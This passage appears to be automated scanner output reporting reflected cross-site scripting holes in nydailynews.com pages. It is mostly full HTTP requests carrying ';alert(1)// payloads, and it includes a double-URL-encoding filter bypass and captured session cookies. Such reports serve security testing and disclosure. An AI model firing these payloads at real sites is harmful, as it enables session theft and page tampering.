__qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:22 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3affa'%3balert(1)//48573eb6d95 was submitted in the REST URL parameter 1. This input was echoed as 3affa';alert(1)//48573eb6d95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local3affa'%3balert(1)//48573eb6d95/education/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:32 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70091
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63dd8'%3balert(1)//d89f8c6c948 was submitted in the REST URL parameter 1. This input was echoed as 63dd8';alert(1)//d89f8c6c948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local63dd8'%3balert(1)//d89f8c6c948/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:41 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70081
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75deb'%3balert(1)//35f115dcb88 was submitted in the REST URL parameter 2. This input was echoed as 75deb';alert(1)//35f115dcb88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/index.html75deb'%3balert(1)//35f115dcb88 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:59 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70081
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76013'%3balert(1)//963b05456c4 was submitted in the REST URL parameter 1. This input was echoed as 76013';alert(1)//963b05456c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local76013'%3balert(1)//963b05456c4/queens/2011/02/08/2011-02-08_astoria_native_is_hoping_to_unmask_his_talent_on_syfy_competition_for_special_ef.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:32 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70185
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 568cb'%3balert(1)//38a234f39b7 was submitted in the REST URL parameter 1. This input was echoed as 568cb';alert(1)//38a234f39b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local568cb'%3balert(1)//38a234f39b7/queens/2011/02/08/2011-02-08_cycle_maker_working_to_share_his_bikes_with_city.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:37 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70153
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e916'%3balert(1)//c0620f7d053 was submitted in the REST URL parameter 1. This input was echoed as 8e916';alert(1)//c0620f7d053 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local8e916'%3balert(1)//c0620f7d053/queens/2011/02/08/2011-02-08_its_the_write_borough_site_to_launch_literary_salon.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:21 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70156
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4b98'%3balert(1)//dd4f889ca6b was submitted in the REST URL parameter 1. This input was echoed as b4b98';alert(1)//dd4f889ca6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localb4b98'%3balert(1)//dd4f889ca6b/queens/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:23 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70088
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6785f'%3balert(1)//b8386426bc4 was submitted in the REST URL parameter 1. This input was echoed as 6785f';alert(1)//b8386426bc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local6785f'%3balert(1)//b8386426bc4/queens/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:41:23 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41784 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload f8692%250aalert%25281%2529%252f%252fc683395795c was submitted in the REST URL parameter 1. This input was echoed as f8692 alert(1)//c683395795c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_localf8692%250aalert%25281%2529%252f%252fc683395795c/queens/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:41:24 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41699 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27239'%3balert(1)//db4ca19e8d was submitted in the REST URL parameter 1. This input was echoed as 27239';alert(1)//db4ca19e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local27239'%3balert(1)//db4ca19e8d/traffic/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:19 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70088
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a1d6'%3balert(1)//99850f0974e was submitted in the REST URL parameter 2. This input was echoed as 6a1d6';alert(1)//99850f0974e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/traffic6a1d6'%3balert(1)//99850f0974e/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:34 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1c5f'%3balert(1)//eb94d58337f was submitted in the REST URL parameter 3. This input was echoed as d1c5f';alert(1)//eb94d58337f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/traffic/index.htmld1c5f'%3balert(1)//eb94d58337f HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:55 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1e7b'%3balert(1)//494aa4c9757 was submitted in the REST URL parameter 1. This input was echoed as c1e7b';alert(1)//494aa4c9757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localc1e7b'%3balert(1)//494aa4c9757/weather/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:16 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cacad'%3balert(1)//be6d0d5648b was submitted in the REST URL parameter 2. This input was echoed as cacad';alert(1)//be6d0d5648b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/weathercacad'%3balert(1)//be6d0d5648b/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:32 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47dcb'%3balert(1)//ac42f972293 was submitted in the REST URL parameter 3. This input was echoed as 47dcb';alert(1)//ac42f972293 in the application's response.
